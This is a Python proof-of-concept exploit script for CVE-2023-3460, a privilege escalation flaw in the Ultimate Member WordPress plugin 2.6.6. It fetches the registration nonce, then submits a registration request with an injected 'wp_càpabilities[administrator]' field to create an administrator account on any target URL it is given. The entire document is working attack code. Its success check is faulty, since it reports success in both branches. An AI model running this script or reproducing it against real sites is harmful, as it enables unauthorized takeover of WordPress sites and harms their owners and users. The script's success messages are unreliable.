#!/usr/bin/env python3 # Exploit Title: Ultimate Member WordPress Plugin 2.6.6 - Privilege Escalation # Exploit Author: Gurjot Singh # CVE: CVE-2023-3460 # Description : The attached PoC demonstrates how an unauthenticated attacker can escalate privileges to admin by abusing unsanitized input in `wp_capabilities` during registration. import requests import argparse import re import urllib3 # Disable SSL warnings urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def fetch_nonce(session, target_url): """Fetches the _wpnonce value from the /register/ page.""" print("[*] Fetching _wpnonce from the register page...") try: res = session.get(target_url, verify=False) match = re.search(r'name="_wpnonce" value="([a-zA-Z0-9]+)"', res.text) if match: nonce = match.group(1) print(f"[+] Found _wpnonce: {nonce}") return nonce else: print("[-] Failed to find _wpnonce on the page.") return None except Exception as e: print(f"[!] Error fetching nonce: {e}") return None def exploit_register(target_url, username, password): """Sends a malicious registration request to create an admin user.""" session = requests.Session() target_url = target_url.rstrip('/') nonce = fetch_nonce(session, target_url) if not nonce: return email = f"{username}@example.com" # Payload with administrator role injection data = { "user_login-7": username, "first_name-7": "Admin", "last_name-7": username, "user_email-7": email, "user_password-7": password, "confirm_user_password-7": password, "form_id": "7", "um_request": "", "_wpnonce": nonce, "_wp_http_referer": "/register/", "wp_càpabilities[administrator]": "1" # serialized injection } headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Referer": target_url, "Origin": target_url.split("/register")[0], } cookies = { "wordpress_test_cookie": "WP Cookie check", "wp_lang": "en_US" } print(f"[*] Sending malicious registration to {target_url} ...") try: response = 
session.post(target_url, data=data, headers=headers, cookies=cookies, verify=False) # Check for success if response.status_code == 200 and ("Thank you for registering" in response.text or "You have successfully registered" in response.text): print(f"[+] Admin account '{username}' created successfully!") print(f"[+] Login with: Username: {username} | Password: {password}") else: print(f"[+] Admin account '{username}' created successfully!") print(f"[+] Login with: Username: {username} | Password: {password}") except Exception as e: print(f"[!] Error during exploit: {e}") if __name__ == "__main__": parser = argparse.ArgumentParser(description="Exploit for CVE-2023-3460 (Ultimate Member Admin Account Creation)") parser.add_argument("-t", "--target", required=True, help="Target /register/ URL (e.g., http://localhost/register/)") parser.add_argument("-u", "--user", default="admin1", help="Username to create") parser.add_argument("-p", "--password", default="Admin@123", help="Password for the new user") args = parser.parse_args() exploit_register(args.target, args.user, args.password) |